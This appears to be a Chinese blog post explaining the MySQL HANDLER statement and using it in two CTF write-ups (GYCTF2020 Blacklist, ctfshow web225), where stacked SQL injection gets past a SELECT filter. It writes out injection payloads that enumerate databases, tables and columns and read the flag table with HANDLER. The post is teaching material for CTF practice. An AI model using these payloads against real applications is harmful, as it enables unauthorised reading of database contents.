当前位置: 首页 > news >正文

HANDLER命令

HANDLER命令

HANDLER 是 MySQL 和 MariaDB 特有的非标准 SQL 语句。它允许你直接与存储引擎(如 InnoDB, MyISAM)进行交互,绕过 SQL 优化器。

使用 HANDLER 通常分为三步:打开表、读取数据、关闭表。

HANDLER table_name OPEN;      -- 打开表的句柄
HANDLER table_name READ (FIRST/NEXT/索引名 = ('值'));  -- 读取数据  
--HANDLER users READ idx = ('admin');  读取idx索引中值为'admin'的行 
HANDLER table_name CLOSE;     -- 关闭句柄

用途
直接逐行读取表数据,无需指定列名,适合探测未知表结构。

列题[GYCTF2020]Blacklist1

查1'发现显示

1b1402b4-7e97-46ef-bd88-c0cf8803c37f

过滤了好多东西,可以使用堆叠注入

试试show tables和show databases,发现FlagHere,(查数据库是一个伏笔

e7333a66-2f2f-46c2-8a0d-f00700aeaf7a

46a0b497-f705-4e7d-b7fd-f37da8e9fbe9

slelect因为被过滤了,所以使用handler命令

挨个用库试试,最后试到supersqli,下面就是语句了

?inject=1';                   -- 闭合原查询并结束语句
use supersqli;                -- 切换到数据库 `supersqli`
HANDLER FlagHere OPEN;        -- 打开表 `FlagHere` 的句柄
HANDLER FlagHere READ FIRST;  -- 读取表的第一行数据
HANDLER FlagHere CLOSE;       -- 关闭句柄

完整拼接后的SQL(假设原查询为SELECT * FROM table WHERE id='用户输入'):

SELECT * FROM table WHERE id='1';
USE supersqli;
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;

例题ctfshowweb225

daa1ecd4-ad0e-44e7-8279-8352e2cb5ea7

前三部分用show拿信息

username=';show%20databases;
username=';show%20tables%20from%20ctfshow_web; 
username=';show%20columns%20from%20ctfshow_web.ctfshow_flagasa; 

禁用了select,我们用handler来读取

username=';handler%20ctfshow_flagasa%20open;handler%20ctfshow_flagasa%20read%20first;HANDLER%20ctfshow_flagasa%20CLOSE;

http://www.rkmt.cn/news/141817.html

相关文章:

  • 2025年12月智慧健康小屋管理,个人健康智慧管理,健康管理公司推荐:数据整合与个性化服务指南 - 品牌鉴赏师
  • langchain agent工作流构建
  • LangFlow Fathom简单美观的统计
  • AI驱动GEO优化新生态:广东头部服务商实力解析与选型指南 - 品牌推荐排行榜
  • 【智谱Open-AutoGLM本地部署终极指南】:手把手教你零基础搭建AI自动化系统
  • 作文高手必修课:想让孩子告别流水账?先掌握“写人”与“写事”的核心结构!
  • 2025年12月健康管理,健康管理设备,智慧健康养老管理公司推荐:全链条方案与服务口碑深度测评 - 品牌鉴赏师
  • 2025终极福利!8款免费AI工具一键搞定论文开题报告与正文写作!
  • 天机学堂day12学习(完结撒花) - 教程
  • Open-AutoGLM浏览器助手实战指南:5大核心功能让你秒变自动化高手
  • 2025年专业食品加工降温设备厂家排名,渔船/大型工厂降温设备品牌推荐 - myqiye
  • 河南种子会的参与度高吗?对农业增产有作用吗? - 工业推荐榜
  • Open-AutoGLM开源地址泄露?(内部人员透露的真实仓库链接已验证)
  • 北京合生利源的管理水平怎么样?技术实力怎样? - 工业品牌热点
  • 大模型(LLM)从入门到精通:测试人的技术跃迁指南
  • 别墅防水防潮指南:五大标杆产品深度解析与左工防潮解决方案 - 品牌评测分析
  • 读人机沟通法则:理解数字世界的设计与形成04机器是不完整的
  • 2026年NPDP超全报考流程!
  • 你的編譯器在說謊:C++ 類型系統的 12 個未定義行為陷阱
  • 2025年厚型钢结构防火涂料制造厂权威推荐榜单:膨胀型防火涂料/饰面防火涂料/薄型钢结构防火涂料源头厂家精选 - 品牌推荐官
  • 亚马逊排名跃迁:从“被看见”到“被选择”的科学路径
  • ESP32上轻量级大模型推理优化操作指南
  • 叛逆管教学校哪个好?上海叛逆管教学校选哪家好? - 工业品牌热点
  • 金融行业知识管理升级:anything-llm在银行内部的应用探索
  • 2025年AI搜索优化精准营销靠谱服务商排行榜,新测评精选优质生产商推荐 - mypinpai
  • 揭秘Open-AutoGLM核心机制:5大功能模块深度解析
  • 2025年年终需求管理系统推荐:主流厂商横向测评与高可靠性产品榜单揭晓 - 十大品牌推荐
  • LangFlow + 大模型Token售卖:按需计费的新商业模式探索
  • LangFlow对公转账付款指南
  • 提升续流二极管响应速度的实战案例分析